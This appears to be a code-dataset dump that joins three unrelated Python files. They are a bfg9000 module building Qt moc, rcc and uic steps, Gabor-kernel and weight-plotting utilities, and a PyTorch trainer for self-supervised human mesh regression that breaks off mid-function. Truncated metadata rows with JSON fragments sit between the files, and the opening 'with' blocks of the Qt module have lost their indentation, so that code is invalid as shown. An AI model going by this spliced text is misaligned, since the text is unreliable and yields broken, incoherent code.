# Register the Qt tool languages: environment-variable names for each tool and
# the source extensions used to recognize their input files.
with known_langs.make('qtmoc', src_lang='c++') as x:
x.vars(compiler='MOC', flags='MOCFLAGS')
with known_langs.make('qrc') as x:
x.vars(compiler='RCC', flags='RCCFLAGS')
x.exts(source=['.qrc'])
with known_langs.make('qtui') as x:
x.vars(compiler='UIC', flags='UICFLAGS')
x.exts(source=['.ui'])
@builder('qtmoc')
def moc_builder(env):
    """Locate a `moc` executable for this environment and wrap it in a builder."""
    lang = known_langs['qtmoc']
    return choose_builder(env, lang, (MocBuilder,), default_candidates=['moc'])
class MocBuilder(Builder):
    """Builder wrapping Qt's `moc` meta-object compiler."""

    def __init__(self, env, langinfo, command, found, version_output):
        brand, version = self._parse_brand(version_output)
        super().__init__(langinfo.name, brand, version)
        tool_name = langinfo.var('compiler').lower()
        flags_var = langinfo.var('flags').lower()
        default_flags = shell.split(env.getvar(langinfo.var('flags'), ''))
        self.transpiler = MocCompiler(
            self, env, command=(tool_name, command, found),
            flags=(flags_var, default_flags)
        )

    @staticmethod
    def _parse_brand(version_output):
        # Qt's moc mentions "moc" in its --version output.
        if 'moc' in version_output:
            return 'qt', detect_version(version_output)
        return 'unknown', None

    @staticmethod
    def check_command(env, command):
        # Probe the candidate binary; its output is fed to _parse_brand.
        return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
                           stderr=shell.Mode.devnull)
class MocCompiler(SimpleBuildCommand):
    """Build command running moc on C++ headers/sources to generate sources."""

    @property
    def deps_flavor(self):
        # moc generation has no dependency-file support.
        return None

    def _call(self, cmd, input, output, flags=None):
        return list(chain(cmd, iterate(flags), [input, '-o', output]))

    def default_name(self, input, step):
        if isinstance(input, SourceFile):
            # foo.cpp -> foo.moc
            return input.path.stripext('.moc').suffix
        # foo.hpp -> moc_foo.<default C++ source ext>
        parent, leaf = input.path.stripext(
            known_langs['c++'].default_ext('source')
        ).splitleaf()
        return parent.append('moc_' + leaf).suffix

    def output_file(self, name, step):
        return SourceFile(Path(name), 'c++')

    def flags(self, options, global_options=None, output=None, mode='normal'):
        result = []
        for opt in options:
            if isinstance(opt, opts.include_dir):
                result.append('-I' + opt.directory.path)
            elif isinstance(opt, opts.define):
                if opt.value:
                    result.append('-D' + opt.name + '=' + opt.value)
                else:
                    result.append('-D' + opt.name)
            elif isinstance(opt, opts.warning):
                for level in opt.value:
                    if level == opts.WarningValue.disable:
                        result.append('--no-warnings')
                    else:
                        raise ValueError('unsupported warning level {!r}'
                                         .format(level))
            elif isinstance(opt, safe_str.stringy_types):
                result.append(opt)
            else:
                raise TypeError('unknown option type {!r}'.format(type(opt)))
        return result
@builder('qrc')
def qrc_builder(env):
    """Locate an `rcc` executable for this environment and wrap it in a builder."""
    lang = known_langs['qrc']
    return choose_builder(env, lang, (RccBuilder,), default_candidates=['rcc'])
class RccBuilder(Builder):
    """Builder wrapping Qt's `rcc` resource compiler."""

    def __init__(self, env, langinfo, command, found, version_output):
        brand, version = self._parse_brand(version_output)
        super().__init__(langinfo.name, brand, version)
        tool_name = langinfo.var('compiler').lower()
        flags_var = langinfo.var('flags').lower()
        default_flags = shell.split(env.getvar(langinfo.var('flags'), ''))
        self.transpiler = RccCompiler(
            self, env, command=(tool_name, command, found),
            flags=(flags_var, default_flags)
        )

    @staticmethod
    def _parse_brand(version_output):
        # Qt's rcc mentions "rcc" in its --version output.
        if 'rcc' in version_output:
            return 'qt', detect_version(version_output)
        return 'unknown', None

    @staticmethod
    def check_command(env, command):
        # Probe the candidate binary; its output is fed to _parse_brand.
        return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
                           stderr=shell.Mode.devnull)
class RccCompiler(SimpleBuildCommand):
    """Build command compiling .qrc resource files into C++ sources."""

    @property
    def deps_flavor(self):
        # Dependencies are emitted gcc-style (via the rccdep wrapper below).
        return 'gcc'

    def _call(self, cmd, input, output, deps=None, flags=None):
        command = list(chain(cmd, iterate(flags), [input, '-o', output]))
        if deps:
            return self.env.tool('rccdep')(command, deps)
        return command

    def default_name(self, input, step):
        # foo.qrc -> foo.<default C++ source ext>
        return input.path.stripext(
            known_langs['c++'].default_ext('source')
        ).suffix

    def output_file(self, name, step):
        return SourceFile(Path(name), 'c++')

    def flags(self, options, global_options=None, output=None, mode='normal'):
        result = []
        for opt in options:
            if isinstance(opt, safe_str.stringy_types):
                result.append(opt)
            else:
                raise TypeError('unknown option type {!r}'.format(type(opt)))
        return result
@builder('qtui')
def qtui_builder(env):
    """Locate a `uic` executable for this environment and wrap it in a builder."""
    lang = known_langs['qtui']
    return choose_builder(env, lang, (UicBuilder,), default_candidates=['uic'])
class UicBuilder(Builder):
    """Builder wrapping Qt's `uic` user-interface compiler."""

    def __init__(self, env, langinfo, command, found, version_output):
        brand, version = self._parse_brand(version_output)
        super().__init__(langinfo.name, brand, version)
        tool_name = langinfo.var('compiler').lower()
        flags_var = langinfo.var('flags').lower()
        default_flags = shell.split(env.getvar(langinfo.var('flags'), ''))
        self.transpiler = UicCompiler(
            self, env, command=(tool_name, command, found),
            flags=(flags_var, default_flags)
        )

    @staticmethod
    def _parse_brand(version_output):
        # Qt's uic mentions "uic" in its --version output.
        if 'uic' in version_output:
            return 'qt', detect_version(version_output)
        return 'unknown', None

    @staticmethod
    def check_command(env, command):
        # Probe the candidate binary; its output is fed to _parse_brand.
        return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
                           stderr=shell.Mode.devnull)
class UicCompiler(SimpleBuildCommand):
    """Build command compiling .ui designer files into C++ headers."""

    @property
    def deps_flavor(self):
        # uic generation has no dependency-file support.
        return None

    def _call(self, cmd, input, output, flags=None):
        return list(chain(cmd, iterate(flags), [input, '-o', output]))

    def default_name(self, input, step):
        # foo.ui -> ui_foo.h
        parent, leaf = input.path.stripext('.h').splitleaf()
        return parent.append('ui_' + leaf).suffix

    def output_file(self, name, step):
        return HeaderFile(Path(name), 'c++')

    def flags(self, options, global_options=None, output=None, mode='normal'):
        result = []
        for opt in options:
            if isinstance(opt, safe_str.stringy_types):
                result.append(opt)
            else:
                raise TypeError('unknown option type {!r}'.format(type(opt)))
        return result
| jimporter/bfg9000 | bfg9000/tools/qt.py | qt.py | py | 7,250 | python | en | code | 73 | github-code | 36 | [
{
"api_name": "languages.known_langs.make",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "languages.known_langs",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "languages.known_langs.make",
"line_number": 18,
"usage_type": "call"
},
{
"api_n... |
38164677251 | import math
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
from scipy.special import factorial
from plot.plot_data import plot_matrixImage
def normalize(X):
    """Min-max scale the array X into [0, 1].

    NOTE(review): a constant array makes max == min and divides by zero.
    """
    lo, hi = X.min(), X.max()
    return (X - lo) / (hi - lo)
def gabor_kernel_2(frequency, sigma_x, sigma_y, theta=0, offset=0, ks=61):
    """Real ks-by-ks Gabor kernel: an oriented Gaussian envelope multiplied by
    a cosine carrier of the given spatial frequency."""
    half = np.floor(ks / 2)
    y, x = np.mgrid[-half:half + 1, -half:half + 1]
    # Rotate the coordinate grid by theta.
    rotx = x * np.cos(theta) + y * np.sin(theta)
    roty = -x * np.sin(theta) + y * np.cos(theta)
    envelope = np.exp(-0.5 * (rotx ** 2 / sigma_x ** 2 + roty ** 2 / sigma_y ** 2))
    envelope /= 2 * np.pi * sigma_x * sigma_y
    return envelope * np.cos(2 * np.pi * frequency * rotx + offset)
def gabor_kernel_3(frequency, x_c, y_c, sigma_x, sigma_y, theta=0, offset=0, ks=61, scale=1):
    """Build a ks x ks Gabor kernel centred at (x_c, y_c).

    Same construction as ``gabor_kernel_2`` but with a translatable
    centre and an overall amplitude ``scale``.
    """
    half = np.floor(ks / 2)
    y, x = np.mgrid[-half:half + 1, -half:half + 1]
    cos_t, sin_t = np.cos(theta), np.sin(theta)
    # Shift to the requested centre, then rotate into the filter's frame.
    rot_x = (x - x_c) * cos_t + (y - y_c) * sin_t
    rot_y = -(x - x_c) * sin_t + (y - y_c) * cos_t
    envelope = np.exp(-0.5 * (rot_x ** 2 / sigma_x ** 2 +
                              rot_y ** 2 / sigma_y ** 2))
    envelope /= 2 * np.pi * sigma_x * sigma_y
    carrier = np.cos(2 * np.pi * frequency * rot_x + offset)
    return envelope * carrier * scale
def poisson(k, lamb):
    """Poisson probability mass function; ``lamb`` is the rate parameter."""
    return np.exp(-lamb) * lamb ** k / factorial(k)
def negLogLikelihood(params, data):
    """Negative log-likelihood of ``data`` under a Poisson model.

    ``params[0]`` is the Poisson rate; remaining entries are ignored
    (the signature matches generic scipy optimizers).
    """
    log_probs = np.log(poisson(data, params[0]))
    return -np.sum(log_probs)
# def tfm_poisson_pdf(x, mu):
# y, J = transformation_and_jacobian(x)
# # For numerical stability, compute exp(log(f(x)))
# return np.exp(y * np.log(mu) - mu - gammaln(y + 1.)) * J
def plot_conv_weights(weights, model_name):
    """Tile a 4-D conv weight tensor into one 2-D mosaic and plot it.

    Kernels of each output channel are stacked vertically, channels are
    concatenated horizontally, the mosaic is min-max normalized, and the
    result is handed to ``plot_matrixImage`` as ``weights_<model_name>``.
    """
    n_rows = weights.shape[0] * weights.shape[2]
    mosaic = np.zeros([n_rows, 0])
    for out_ch in range(weights.shape[0]):
        column = np.empty([0, weights.shape[2]])
        for in_ch in range(weights.shape[1]):
            column = np.concatenate((column, weights[out_ch, in_ch]), axis=0)
        mosaic = np.concatenate((mosaic, column), axis=1)
    lo, hi = np.min(mosaic), np.max(mosaic)
    mosaic = (mosaic - lo) / (hi - lo)
    plot_matrixImage(mosaic, 'weights_' + model_name)
def plot_weights(weights, model_name, gs=None, name=None):
    """Render each 2-D kernel of a 4-D weight tensor as a grayscale grid.

    If ``gs`` is None a standalone figure is created, saved to
    ``weights_<model_name>.png`` and shown; otherwise the grid is drawn
    inside the given ``SubplotSpec`` and ``name`` titles the first
    subplot of each row.
    """
    show = False
    if gs is None:
        plt.figure(figsize=(10, 2), frameon=False)
        inner = gridspec.GridSpec(weights.shape[0], weights.shape[1], wspace=0.2, hspace=0.2)
        show = True
    else:
        # NOTE(review): column count is hard-coded to 8 here, but the loop
        # below iterates weights.shape[1] columns — presumably shape[1] <= 8
        # for all callers; confirm.
        inner = gridspec.GridSpecFromSubplotSpec(weights.shape[0], 8,
                                                 subplot_spec=gs, wspace=0.1, hspace=0.1)
    # gs = gridspec.GridSpec(, width_ratios=[1] * weights.shape[1],
    #                        wspace=0.5, hspace=0.5, top=0.95, bottom=0.05, left=0.1, right=0.95)
    idx = 0
    for i in range(0, weights.shape[0]):
        for j in range(0, weights.shape[1]):
            kernel1 = weights[i, j]
            ax_ = plt.subplot(inner[i, j])
            ax_.set_xticks([])
            ax_.set_yticks([])
            ax_.set_axis_off()
            ax_.imshow(kernel1, cmap='gray')
            #
            idx += 1
            if j == 0:
                # Label the first kernel of each row with the model name.
                ax_.set_title(name, pad=10, weight='semibold', size=16)
    if show:
        plt.tight_layout()
        plt.savefig(f'weights_{model_name}.png')
        plt.show()
def show_kernels(weights, func_name, gs=None):
    """Display each multi-channel kernel of a conv layer as an RGB image.

    Weights are transposed to channels-last and each kernel is min-max
    normalized individually. Standalone mode (``gs is None``) saves
    ``kernels_<func_name>.png``; otherwise kernels are drawn inside the
    given ``SubplotSpec`` and ``func_name`` titles the first subplot.
    """
    # NOTE(review): `number` is computed but never used below.
    number = math.ceil(math.sqrt(weights.shape[0]))
    img = np.transpose(weights, (0, 2, 3, 1))  # to (kernel, H, W, channel)
    idx = 0
    show = False
    if gs is None:
        plt.figure(figsize=(10, 10))
        inner = gridspec.GridSpec(1, weights.shape[0], wspace=0.2, hspace=0.2)
        show = True
    else:
        # NOTE(review): hard-coded 8 columns — assumes at most 8 kernels
        # when embedding in an outer grid; confirm against callers.
        inner = gridspec.GridSpecFromSubplotSpec(1, 8,
                                                 subplot_spec=gs, wspace=0.1, hspace=0.1)
    # fig, axes = pyplot.subplots(ncols=weights.shape[0], figsize=(20, 4))
    for j in range(weights.shape[0]):  # in zip(axes, range(weights.shape[0])):
        # for i in range(number):
        ax_ = plt.subplot(inner[idx])
        ax_.set_xticks([])
        ax_.set_yticks([])
        ax_.set_axis_off()
        # ax.set_title(f'Kernel {idx}', pad=3)
        # imgs = img[range(j*8, (j*8)+number)]
        channel = img[idx]
        # Per-kernel min-max normalization so each image uses full contrast.
        f_min, f_max = channel.min(), channel.max()
        channel = (channel - f_min) / (f_max - f_min)
        ax_.imshow(channel)
        if j == 0:
            ax_.set_title(func_name, pad=10, weight='bold', size=18)
        idx += 1
    if show:
        plt.tight_layout()
        plt.savefig(f'kernels_{func_name}.png')
        plt.show()
def similarity(m1, m2):
    """Return the mean absolute element-wise difference of two 2-D arrays.

    Lower values mean more similar matrices; 0 means identical.
    Both inputs must have the same shape.
    """
    # Vectorized replacement for the original O(rows*cols) Python double
    # loop; mean() == sum of |differences| / (rows * cols), so the result
    # is numerically equivalent.
    return np.abs(m1 - m2).mean()
| franzigeiger/training_reductions | utils/gabors.py | gabors.py | py | 5,020 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "numpy.floor",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.mgrid",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "numpy.cos",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.sin",
"line_number":... |
70553069544 | import os, datetime, time
import torch
import torch.optim as optim
import numpy as np
import math
import cv2
import tqdm
import config
import constants
from utils.trainer_utils import (
AverageMeter,
get_HHMMSS_from_second,
save_checkpoint,
save_all_img,
save_joints3d_img,
save_mesh,
save_templates_info,
train_only_3task_network,
train_hmr_using_3task,
train_hmr_using_joints,
train_texture_net,
train_hmr_using_adv_loss,
)
from utils.imutils import uncrop
from lib.utils.eval_utils import (
batch_compute_similarity_transform_torch,
)
from lib.utils.geometry import batch_rodrigues
from lib.models.smpl import SMPL, SMPL_MODEL_DIR, H36M_TO_J14, SMPL_MEAN_PARAMS
# import soft_renderer as sr
# from soft_renderer.mesh import Mesh
# from soft_renderer.renderer import SoftRenderer
# import soft_renderer.cuda.load_textures as load_textures_cuda
from lib.models.smpl import get_smpl_faces
class Trainer():
def __init__(
    self,
    model_name,
    HMR,
    context_encoder_net,
    discriminator,
    jigsaw_puzzle_net,
    rotation_net,
    texture_net,
    img_renderer,
    seg_renderer,
    texture_discriminator,
    train_dataloader,
    test_dataloader,
    test_dataloader_h36m,
    test_dataloader_3dpw,
    test_dataloader_lsp,
    loss_fn_BCE,
    loss_fn_CE,
    loss_fn_MSE,
    loss_fn_keypoints,
    loss_fn_mask,
    HMR_optimizer_all,
    HMR_scheduler_all,
    discriminator_optimizer,
    context_encoder_optimizer,
    jigsaw_puzzle_optimizer,
    rotation_optimizer,
    texture_net_optimizer,
    texture_discriminator_optimizer,
    device,
    num_epoch,
    args
):
    """Store all networks, dataloaders, losses and optimizers on the
    trainer, and preload the SMPL models / joint regressors used during
    training and evaluation.

    Test dataloaders are optional: each is only attached when truthy,
    so the corresponding attribute may be absent. Output artifacts go
    to ``args.output_dir`` when given, otherwise a timestamped folder.
    """
    self.model_name = model_name
    self.args = args
    # model
    self.HMR = HMR
    self.context_encoder_net = context_encoder_net
    self.jigsaw_puzzle_net = jigsaw_puzzle_net
    self.rotation_net = rotation_net
    self.discriminator = discriminator
    self.texture_net = texture_net
    self.img_renderer = img_renderer
    self.seg_renderer = seg_renderer
    self.texture_discriminator = texture_discriminator
    # device
    self.device = device
    # dataloader (optional ones are only attached when provided)
    self.train_dataloader = train_dataloader
    if test_dataloader:
        self.test_dataloader = test_dataloader
    if test_dataloader_h36m:
        self.test_dataloader_h36m = test_dataloader_h36m
    if test_dataloader_3dpw:
        self.test_dataloader_3dpw = test_dataloader_3dpw
    if test_dataloader_lsp:
        self.test_dataloader_lsp = test_dataloader_lsp
    # loss
    self.loss_fn_BCE = loss_fn_BCE
    self.loss_fn_CE = loss_fn_CE
    self.loss_fn_MSE = loss_fn_MSE
    self.loss_fn_keypoints = loss_fn_keypoints
    self.loss_fn_mask = loss_fn_mask
    # optimizer
    self.HMR_optimizer_all = HMR_optimizer_all
    self.HMR_scheduler_all = HMR_scheduler_all
    self.discriminator_optimizer = discriminator_optimizer
    self.context_encoder_optimizer = context_encoder_optimizer
    self.jigsaw_puzzle_optimizer = jigsaw_puzzle_optimizer
    self.rotation_optimizer = rotation_optimizer
    self.texture_net_optimizer = texture_net_optimizer
    self.texture_discriminator_optimizer = texture_discriminator_optimizer
    # misc variables
    self.num_epoch = num_epoch
    self.freq_print = args.freq_print
    self.num_patch = 4  # jigsaw puzzle grid size (presumably 2x2) — TODO confirm
    self.tex_size = args.tex_size
    today = datetime.datetime.now()
    self.today = datetime.datetime.strftime(today, "%y%m%d_%H%M%S")
    # Fall back to a timestamped output folder when no explicit dir is given.
    self.output_dir = self.args.output_dir if self.args.output_dir else self.today
    # smpl and J_regressor (neutral model for prediction; gendered ones for 3DPW GT)
    self.smpl_neutral = SMPL("data/vibe_data",
                             create_transl=False).to(self.device)
    self.smpl_male = SMPL("data/vibe_data",
                          gender='male',
                          create_transl=False).to(self.device)
    self.smpl_female = SMPL("data/vibe_data",
                            gender='female',
                            create_transl=False).to(self.device)
    self.J_regressor = np.load("data/vibe_data/J_regressor_h36m.npy")
    self.J_regressor_torch = torch.from_numpy(self.J_regressor).float()
    parts_texture = np.load("data/vertex_texture.npy")
    self.parts_texture = torch.from_numpy(parts_texture).to(self.device).float()
    self.cube_parts = torch.FloatTensor(np.load("data/cube_parts.npy")).to(self.device)
def train(self):
    """Run one training epoch (``self.epoch`` is set by the caller).

    Two-stage schedule:
      * ``epoch < args.first_stage_nEpoch``: train only the three
        self-supervised task networks (context encoder + discriminator,
        jigsaw puzzle, rotation) and the texture network, with the HMR
        mesh regressor frozen.
      * later epochs: train HMR against the frozen task networks
        (3-task loss), the texture/segmentation losses, an adversarial
        loss on renderings, and — unless ``args.self_supervised`` —
        2D/3D joint supervision.

    Side effects: updates the per-loss ``AverageMeter``s, periodically
    dumps debug images/meshes under ``self.output_dir``, and appends
    formatted progress lines to ``self.train_templates`` (persisted via
    ``save_templates_info``).
    """
    print("===================Train===================\nEpoch {} Start".format(self.epoch+1))
    # Progress-line format; placeholders are filled from the meters below.
    train_template = \
        'Epoch: {}/{} | Batch_idx: {}/{} | ' \
        'loss_DC: {losses_DC.val:.4f} ({losses_DC.avg:.4f}) | loss_CE: {losses_CE.val:.4f} ({losses_CE.avg:.4f}) | ' \
        'loss_JP: {losses_JP.val:.4f} ({losses_JP.avg:.4f}) | acc_JP: {acces_JP.val:.4f} ({acces_JP.avg:.4f}) | ' \
        'loss_ROT: {losses_ROT.val:.4f} ({losses_ROT.avg:.4f}) | acc_ROT: {acces_ROT.val:.4f} ({acces_ROT.avg:.4f}) | ' \
        'loss_Texture: {losses_texture_ori_img.val:.4f} ({losses_texture_ori_img.avg:.4f}) | ' \
        'loss_Seg: {losses_seg.val:.4f} ({losses_seg.avg:.4f}) | ' \
        'loss_Texture_Total: {losses_texture_total.val:.4f} ({losses_texture_total.avg:.4f}) | ' \
        'loss_disc_e: {losses_disc_e.val:.4f} ({losses_disc_e.avg:.4f}) | ' \
        'loss_disc_d: {losses_disc.val:.4f} ({losses_disc.avg:.4f}) | ' \
        'loss_disc_real: {losses_disc_real.val:.4f} ({losses_disc_real.avg:.4f}) | ' \
        'loss_disc_fake: {losses_disc_fake.val:.4f} ({losses_disc_fake.avg:.4f}) | ' \
        'loss_HMR_3task: {losses_HMR_3task.val:.4f} ({losses_HMR_3task.avg:.4f}) | ' \
        'loss_HMR_joints3d: {losses_HMR_joints3d.val:.4f} ({losses_HMR_joints3d.avg:.4f}) | ' \
        'loss_joints: {losses_joints.val:.4f} ({losses_joints.avg:.4f}) | ' \
        'MPJPE: {train_MPJPE.val:.4f} ({train_MPJPE.avg:.4f}) | ' \
        'PA_MPJPE: {train_PA_MPJPE.val:.4f} ({train_PA_MPJPE.avg:.4f}) | ' \
        'loss_total: {losses_total.val:.4f} ({losses_total.avg:.4f}) | ' \
        'Batch duration: {duration}'
    batch_start = time.time()
    # Fresh meters each epoch — `.val` is the latest batch, `.avg` the epoch mean.
    self.losses_DC = AverageMeter()  # Discriminator Loss
    self.losses_CE = AverageMeter()  # Context Encoder Loss
    self.losses_JP = AverageMeter()  # Jigsaw Puzzle Loss
    self.acces_JP = AverageMeter()  # Jigsaw Puzzle Accuracy
    self.losses_ROT = AverageMeter()  # Rotation Loss
    self.acces_ROT = AverageMeter()  # Rotation Accuracy
    self.losses_texture_ori_img = AverageMeter()  # Texture Loss
    self.losses_seg = AverageMeter()  # Segmentation Loss
    self.losses_texture_total = AverageMeter()  # Texture Loss + Segmentation Loss
    self.losses_HMR_3task = AverageMeter()  # Discriminator Loss + Context Encoder Loss + Rotation Loss
    self.losses_disc_e = AverageMeter()  # Encoder Discriminator Loss for rendering img
    self.losses_disc = AverageMeter()  # Real + Fake Discriminator Loss
    self.losses_disc_real = AverageMeter()  # Discriminator Loss for Real
    self.losses_disc_fake = AverageMeter()  # Discriminator Loss for Fake
    self.losses_total = AverageMeter()  # Total Sum Loss
    self.losses_joints = AverageMeter()  # 2d + 3d joints loss
    self.losses_HMR_joints3d = AverageMeter()  # 3D joints loss
    self.train_MPJPE = AverageMeter()  # MPJPE
    self.train_PA_MPJPE = AverageMeter()  # PA_MPJPE
    len_train_dataloader = len(self.train_dataloader)
    for batch_idx, item in tqdm.tqdm(enumerate(self.train_dataloader), desc='Train {}/{}'.format(self.epoch+1, self.num_epoch), total=len(self.train_dataloader)):
        # Move every input of the batch onto the training device.
        img = item['img'].to(self.device)
        black_img = item['black_img'].to(self.device)
        context_encoder_input = item['context_encoder_input'].to(self.device)
        center_crop_img = item['center_crop_img'].to(self.device)
        jigsaw_input = item['jigsaw_input'].to(self.device)
        rotation_img = item['rotation_input'].to(self.device)
        jigsaw_order = item['jigsaw_order'].to(self.device)
        rotation_idx = item['rotation_idx'].to(self.device)
        joints3d = item['pose_3d'].to(self.device)
        has_joints3d = item['has_pose_3d'].to(self.device)
        joints2d = item['keypoints'].to(self.device)
        batch_size = img.shape[0]
        gt_mask = item['gt_mask'].to(self.device)
        has_mask = item['has_mask'].to(self.device)
        # Real/fake label tensors for the GAN-style losses.
        self.zeros = torch.zeros([batch_size, 1]).to(self.device)
        self.ones = torch.ones([batch_size, 1]).to(self.device)
        faces = get_smpl_faces().astype(np.int32)
        faces = torch.from_numpy(faces).to(self.device)
        faces = faces.expand((batch_size, -1, -1))
        joint_mapper_gt = constants.J24_TO_J17 if self.args.test_dataset == 'mpi-inf-3dhp' else constants.J24_TO_J14
        if self.epoch < self.args.first_stage_nEpoch:  # first stage
            # Training 3 Task net
            # Discriminator, Context Encoder, Jigsaw Puzzle, Rotation net
            self.HMR.eval()
            self.context_encoder_net.train()
            self.discriminator.train()
            self.jigsaw_puzzle_net.train()
            self.rotation_net.train()
            output_ce_224 = \
                train_only_3task_network(
                    self.HMR,
                    self.context_encoder_net,
                    self.discriminator,
                    self.jigsaw_puzzle_net,
                    self.rotation_net,
                    self.loss_fn_BCE,
                    self.loss_fn_MSE,
                    self.loss_fn_CE,
                    self.losses_CE,
                    self.losses_DC,
                    self.acces_JP,
                    self.losses_JP,
                    self.acces_ROT,
                    self.losses_ROT,
                    self.discriminator_optimizer,
                    self.context_encoder_optimizer,
                    self.jigsaw_puzzle_optimizer,
                    self.rotation_optimizer,
                    img,
                    context_encoder_input,
                    center_crop_img,
                    jigsaw_input,
                    jigsaw_order,
                    rotation_img,
                    rotation_idx,
                    self.num_patch,
                    self.ones,
                    self.zeros,
                    batch_size,
                )
            # Training Texture Net
            self.texture_net.train()
            output_train_texture_net = \
                train_texture_net(
                    self.HMR,
                    self.texture_net,
                    self.img_renderer,
                    self.loss_fn_MSE,
                    self.loss_fn_mask,
                    self.losses_texture_ori_img,
                    self.losses_seg,
                    self.losses_texture_total,
                    self.texture_net_optimizer,
                    img,
                    black_img,
                    batch_size,
                    self.args,
                    gt_mask,
                    has_mask,
                    train_first_stage=True
                )
            # First-stage return: (mask, detach_images, rendering, vertices).
            mask = output_train_texture_net[0]
            detach_images = output_train_texture_net[1]
            rendering = output_train_texture_net[2]
            vertices = output_train_texture_net[3]
        # train hmr & texture net using 3task, rendering, segmentation and gan loss (or joints)
        else:  # second stage
            # Task networks are frozen; only HMR, texture net and its
            # discriminator are updated.
            self.HMR.eval()
            self.context_encoder_net.eval()
            self.discriminator.eval()
            self.jigsaw_puzzle_net.eval()
            self.rotation_net.eval()
            self.texture_net.train()
            self.texture_discriminator.train()
            # Training Mesh network (HMR) using 3 Task Loss
            loss_HMR, output_ce_224 = \
                train_hmr_using_3task(
                    self.HMR,
                    self.context_encoder_net,
                    self.discriminator,
                    self.jigsaw_puzzle_net,
                    self.rotation_net,
                    self.loss_fn_BCE,
                    self.loss_fn_MSE,
                    self.loss_fn_CE,
                    self.losses_CE,
                    self.acces_JP,
                    self.losses_JP,
                    self.acces_ROT,
                    self.losses_ROT,
                    self.losses_HMR_3task,
                    img,
                    context_encoder_input,
                    center_crop_img,
                    jigsaw_input,
                    jigsaw_order,
                    rotation_img,
                    rotation_idx,
                    self.num_patch,
                    self.ones,
                    self.zeros,
                    batch_size,
                    self.args
                )
            loss_all = loss_HMR
            # Training Texture net
            output_train_texture_net = \
                train_texture_net(
                    self.HMR,
                    self.texture_net,
                    self.img_renderer,
                    self.loss_fn_MSE,
                    self.loss_fn_mask,
                    self.losses_texture_ori_img,
                    self.losses_seg,
                    self.losses_texture_total,
                    self.texture_net_optimizer,
                    img,
                    black_img,
                    batch_size,
                    self.args,
                    gt_mask,
                    has_mask,
                    train_first_stage=False
                )
            # Second-stage return: (texture_loss, mask, detach_images, rendering, vertices).
            texture_loss = output_train_texture_net[0]
            loss_all += texture_loss
            mask = output_train_texture_net[1]
            detach_images = output_train_texture_net[2]
            rendering = output_train_texture_net[3]
            vertices = output_train_texture_net[4]
            # Training HMR using adversarial loss
            e_disc_loss, d_disc_loss, rendering_bg = \
                train_hmr_using_adv_loss(
                    self.HMR,
                    self.texture_discriminator,
                    self.texture_net,
                    self.img_renderer,
                    self.losses_disc_e,
                    self.losses_disc,
                    self.losses_disc_real,
                    self.losses_disc_fake,
                    img,
                    batch_size,
                )
            loss_all += e_disc_loss
            # Discriminator is updated separately from the generator losses.
            self.texture_discriminator_optimizer.zero_grad()
            d_disc_loss.backward()
            self.texture_discriminator_optimizer.step()
            if not self.args.self_supervised:
                # Training Mesh network (HMR) using joints
                joints_loss, mpjpe, pa_mpjpe, num_data = train_hmr_using_joints(
                    self.HMR,
                    self.loss_fn_keypoints,
                    self.losses_HMR_joints3d,
                    img,
                    joints2d,
                    joints3d,
                    has_joints3d,
                    joint_mapper_gt,
                    batch_size,
                    self.device,
                    self.args,
                )
                loss_all += joints_loss
                self.losses_joints.update(joints_loss.item(), num_data)
                self.train_MPJPE.update(mpjpe.item(), num_data)
                self.train_PA_MPJPE.update(pa_mpjpe.item(), num_data)
            # One combined optimizer step for all accumulated HMR losses.
            self.HMR_optimizer_all.zero_grad()
            self.losses_total.update(loss_all.item(), batch_size)
            loss_all.backward()
            self.HMR_optimizer_all.step()
        # Periodically dump up to 10 debug images (and meshes in stage two).
        if (batch_idx==0 or (batch_idx+1)%self.args.freq_print==0):
            for i in range(10 if batch_size > 10 else batch_size):
                img_dict = dict()
                ### original img ###
                img_dict["orig_img.jpg"] = img[i]
                ### context encoder input img ###
                img_dict["ce_input_img.jpg"] = context_encoder_input[i].clone().detach()
                ### center crop img for CE ###
                img_dict["center_crop_img.jpg"] = center_crop_img[i].clone().detach()
                ### output img of CE ###
                img_dict["reconst_img.jpg"] = output_ce_224[i].clone().detach()
                ### jigsaw input img ###
                img_dict["jigsaw_input_img.jpg"] = jigsaw_input[i].clone().detach()
                ### ratation input img ###
                img_dict["rotation_input_img.jpg"] = rotation_img[i].clone().detach()
                ### texture img ###
                img_dict["rendering.jpg"] = rendering[i].clone().detach()
                ### segmentation img ###
                img_dict["mask.jpg"] = mask[i].clone().detach()
                ### detach img ###
                img_dict["detach.jpg"] = detach_images[i].clone().detach()
                ### Segmentation gt ###
                img_dict["seg_gt.jpg"] = gt_mask[i].clone().detach()
                if self.epoch >= self.args.first_stage_nEpoch:
                    ### rendering background ###
                    img_dict["rendering_bg.jpg"] = rendering_bg[i].clone().detach()
                save_all_img(img_dict, self.output_dir,
                             self.epoch+1, i+batch_idx)
                ### save mesh ###
                if self.epoch >= self.args.first_stage_nEpoch:
                    _faces = faces[i].clone().detach()
                    _vertices = vertices[i].clone().detach()
                    save_mesh(
                        _vertices, _faces,
                        self.output_dir,
                        self.epoch+1,
                        i,
                    )
        ### print train info while running in batch loop ###
        if (batch_idx+1) % self.freq_print == 0 or (batch_idx+1) == len_train_dataloader:
            train_template_filled = train_template.format(
                self.epoch+1, self.num_epoch,
                batch_idx+1, len(self.train_dataloader),
                losses_DC=self.losses_DC,
                losses_CE=self.losses_CE,
                losses_JP=self.losses_JP,
                acces_JP=self.acces_JP,
                losses_ROT=self.losses_ROT,
                acces_ROT=self.acces_ROT,
                losses_texture_ori_img=self.losses_texture_ori_img,
                losses_seg=self.losses_seg,
                losses_texture_total=self.losses_texture_total,
                losses_disc_e=self.losses_disc_e,
                losses_disc=self.losses_disc,
                losses_disc_real=self.losses_disc_real,
                losses_disc_fake=self.losses_disc_fake,
                losses_HMR_3task=self.losses_HMR_3task,
                losses_HMR_joints3d=self.losses_HMR_joints3d,
                losses_joints=self.losses_joints,
                losses_total=self.losses_total,
                train_MPJPE=self.train_MPJPE,
                train_PA_MPJPE=self.train_PA_MPJPE,
